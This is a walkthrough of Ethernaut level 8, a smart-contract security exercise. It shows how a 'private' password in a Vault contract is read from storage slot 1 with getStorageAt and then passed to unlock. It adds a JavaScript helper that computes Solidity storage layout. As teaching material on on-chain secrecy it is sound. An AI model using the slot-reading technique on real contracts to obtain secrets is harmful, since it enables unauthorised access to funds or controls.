This is level 8 of the Ethernaut game.
Pre-requisites
- Layout of state variables in Solidity
- Reading storage at a slot in contract
Hack
Given contract:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Vault {
  bool public locked;
  bytes32 private password;

  constructor(bytes32 _password) public {
    locked = true;
    password = _password;
  }

  function unlock(bytes32 _password) public {
    if (password == _password) {
      locked = false;
    }
  }
}
player has to set locked to false.
The only way is to call unlock with the correct password.
Although the password state variable is private, anyone can still read a storage variable by determining its storage slot. Therefore sensitive information should not be stored on-chain, even if it is marked private.
Above, the password is at storage slot 1 in Vault.
Let's read it:
password = await web3.eth.getStorageAt(contract.address, 1)
Call unlock with password:
await contract.unlock(password)
Unlocked. Verify by:
await contract.locked() === false
And that's it.
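Why password sits in slot 1: the layout rule from the pre-requisites, as an added example that is not part of the original post or the Ethernaut code. It generalizes beyond Vault to any sequence of statically sized value types; the function names (sizeOf, storageLayout, extract) and the slot contents are constructed for illustration.

```javascript
// Added example: where Solidity places statically sized state variables.
// Covers value types only (bool, address, intN/uintN, bytesN); mappings,
// dynamic arrays, strings and structs follow other rules and are rejected.
function sizeOf(type) {
  if (type === "bool") return 1;
  if (type === "address") return 20;
  let m = /^u?int(\d*)$/.exec(type);
  if (m) {
    const bits = m[1] === "" ? 256 : Number(m[1]);
    if (bits >= 8 && bits <= 256 && bits % 8 === 0) return bits / 8;
  }
  m = /^bytes(\d+)$/.exec(type);
  if (m && Number(m[1]) >= 1 && Number(m[1]) <= 32) return Number(m[1]);
  throw new Error(`unsupported type: ${type}`);
}

// Variables are laid out in declaration order; one that does not fit in the
// rest of the current 32-byte slot starts the next slot.
function storageLayout(vars) {
  let slot = 0, offset = 0;
  return vars.map(({ name, type }) => {
    const size = sizeOf(type);
    if (offset + size > 32) { slot += 1; offset = 0; }
    const entry = { name, type, slot, offset, size };
    offset += size;
    return entry;
  });
}

// Cut one variable out of a 32-byte slot word as returned by getStorageAt.
// Offsets count from the low-order (rightmost) byte of the word.
function extract(wordHex, { offset, size }) {
  const hex = wordHex.replace(/^0x/, "").padStart(64, "0");
  const end = 64 - 2 * offset;
  return "0x" + hex.slice(end - 2 * size, end);
}

// Vault's declarations, plus constructed slot contents (not real chain data).
const vault = storageLayout([
  { name: "locked", type: "bool" },
  { name: "password", type: "bytes32" },
]);
const sampleSlots = ["0x" + "00".repeat(31) + "01", "0x" + "ab".repeat(32)];
for (const v of vault) {
  console.log(v.name, "slot", v.slot, "=", extract(sampleSlots[v.slot], v));
}
```

Because a bytes32 never fits beside another variable, a private secret of that type always occupies a whole slot of its own, which is exactly what getStorageAt returns.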
Learned something awesome? Consider starring the github repo 😄 and following me on twitter here 🙏